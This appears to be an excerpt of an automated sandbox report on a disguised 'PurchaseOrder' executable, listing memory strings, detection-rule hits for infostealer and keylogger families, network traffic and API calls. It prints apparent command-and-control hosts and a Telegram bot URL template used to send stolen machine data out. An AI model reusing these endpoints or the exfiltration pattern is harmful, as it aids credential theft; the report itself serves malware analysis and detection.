            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/0
            Source: RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
            Source: RegSvcs.exe, 00000001.00000002.4134562794.000000000147B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.starfieldtech.com/repository/1402
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-677.crl0c
            Source: RegSvcs.exe, 00000001.00000002.4134562794.000000000147B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
            Source: RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
            Source: RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.starofseasmarine.com
            Source: RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/08
            Source: RegSvcs.exe, 00000001.00000002.4134562794.000000000147B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0;
            Source: RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0F
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RegSvcs.exe, 00000001.00000002.4134562794.000000000147B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C32000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4140126193.0000000005C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.starfieldtech.com/repository/0
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003451000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.0000000003482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
            Source: RegSvcs.exe, 00000001.00000002.4136012994.000000000344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RegSvcs.exe, 00000001.00000002.4136012994.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.0000000003334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: RegSvcs.exe, 00000001.00000002.4136012994.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: RegSvcs.exe, 00000001.00000002.4136012994.00000000032EF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000335B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.0000000003334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: RegSvcs.exe, 00000001.00000002.4137501315.0000000004695000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000444D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000429C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004474000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004555000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000043FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: RegSvcs.exe, 00000001.00000002.4137501315.0000000004277000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000444F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004530000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: RegSvcs.exe, 00000001.00000002.4137501315.0000000004695000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000444D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000429C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004474000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004555000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000043FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: RegSvcs.exe, 00000001.00000002.4137501315.0000000004277000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000444F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004530000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.000000000464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RegSvcs.exe, 00000001.00000002.4137501315.00000000045C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137501315.00000000045F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: RegSvcs.exe, 00000001.00000002.4136012994.0000000003473000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
            Source: RegSvcs.exe, 00000001.00000002.4136012994.000000000347D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            System Summary

            barindex
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.z1PurchaseOrder.exe.b20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000000.00000002.1696353856.0000000000B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000001.00000002.4133626873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 7456, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: initial sampleStatic PE information: Filename: z1PurchaseOrder.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0047E1FA0_2_0047E1FA
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0044EBBC0_2_0044EBBC
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0044ED9A0_2_0044ED9A
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_040F58600_2_040F5860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408C601_2_00408C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040DC111_2_0040DC11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00407C3F1_2_00407C3F
